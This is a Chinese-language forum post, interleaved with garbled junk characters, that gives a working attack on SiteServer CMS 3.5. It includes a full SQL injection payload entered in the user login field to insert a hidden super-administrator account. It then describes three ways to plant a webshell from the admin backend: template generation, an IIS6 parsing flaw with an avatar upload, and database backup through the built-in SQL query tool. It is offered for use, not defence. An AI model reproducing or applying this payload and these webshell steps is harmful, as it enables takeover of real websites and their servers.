经测试秒杀最新的3.5版
+ p+ b: u* N) X4 d, |8 }stieserver官网:www.siteserver.cn& I% u& m) Q$ s$ O& M4 L% `
EXP:
! S( k, k! ?0 f' u直接访问UserCenter/login.aspx
) z9 x7 K! k# g1 } {5 g# G' E: a+ L用户名处输入:
- _/ w- K9 Z$ H- W9 G7 o& n& T: v; g5 V2 V' L2 D6 H$ v% b4 w
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–7 b; h$ {( |( q! t* t
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。
1 E9 W7 C( ~5 {( c之后再访问后台SiteServer/login.aspx用插入的用户登陆9 g2 a" z2 R* r) d! \7 j
后台拿webshell的三种方法:
$ P) K) I( Q5 J( X2 C: W) ~一、
! I5 b6 a" S- }: t. d: }+ \站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
* Q5 {" r8 F5 p9 d( f$ s6 O二、* N* \; g/ U2 F5 g9 ~* x8 H
成员权限-》添加用户-》用户名为:1.asp* Q* y) v( F7 D& \8 O6 z5 Q
http://127.0.0.1/usercenter/& l2 d( [' F' O3 M7 S4 F
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell+ U8 \4 t; z5 n8 i3 \9 ~
(ps:后台添加用户时不会验证是否含有非法字符)( G! \; z6 T4 \* Y
三、
6 {! ^( A! ~" L; U; [7 m G) }系统工具-》实用工具-》机器参数查看
- W, k' x9 G: `8 l可以看到数据库类型、名称,WEB路径
' M; O, g, D O" c- }系统工具-》数据库工具-》SQL语句查询
2 Y+ ]0 e6 J# ?* F这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |